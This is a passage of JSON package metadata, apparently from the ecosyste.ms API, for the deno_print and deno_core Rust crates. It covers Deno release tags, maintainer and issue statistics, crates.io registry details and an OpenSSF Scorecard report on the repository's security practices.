.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T19:46:54.708Z","dependent_packages_count":0,"downloads":1242,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":88.58447186257536,"dependent_repos_count":13.592702189210836,"dependent_packages_count":17.954574040606648,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.04391603079761},"purl":"pkg:cargo/deno_print","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_print","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_print","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_print/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-08T15:20:51.828Z","issues_count":6662,"pull_requests_count":9678,"avg_time_to_close_issue":17121605.73139413,"avg_time_to_close_pull_request":1530875.9301115242,"issues_closed_count":3814,"pull_requests_closed_count":8069,"pull_request_authors_count":594,"issue_authors_count":2496,"avg_comments_per_issue":2.5022515761032724,"avg_comments_per_pull_request":0.7209134118619549,"merged_pull_requests_count":7045,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":682,"past_year_pull_requests_count":1198,"past_year_avg_time_to_close_issue":1327952.9787234042,"past_year_avg_time_to_close_pull_request":1317968.8908554572,"past_year_issues_closed_count":235,"past_year_pull_requests_closed_count":678,"past_year_pull_request_authors_count":194,"past_year_issue_authors_count":379,"past_year_avg_comments_per_issue":1.2272727272727273,"past_year_avg_comments_per_pull_request":1.1327212020033388,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":509,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1808,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":925,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":401,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_print/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-07-03T14:21:07.265Z","updated_at":"2026-07-03T14:21:07.265Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-07-03T14:21:07.403Z","updated_at":"2026-07-03T14:21:07.403Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047191,"name":"deno_core","ecosystem":"cargo","description":"A modern JavaScript/TypeScript runtime built with V8, Rust, and Tokio","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":399,"first_release_published_at":"2019-09-13T17:10:32.877Z","latest_release_published_at":"2026-08-27T15:19:42.476Z","latest_release_number":"0.411.0","last_synced_at":"2026-09-07T23:02:13.371Z","created_at":"2022-04-12T09:58:47.710Z","updated_at":"2026-09-08T21:39:40.338Z","registry_url":"https://crates.io/crates/deno_core/","install_command":"cargo install deno_core","documentation_url":"https://docs.rs/deno_core/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using 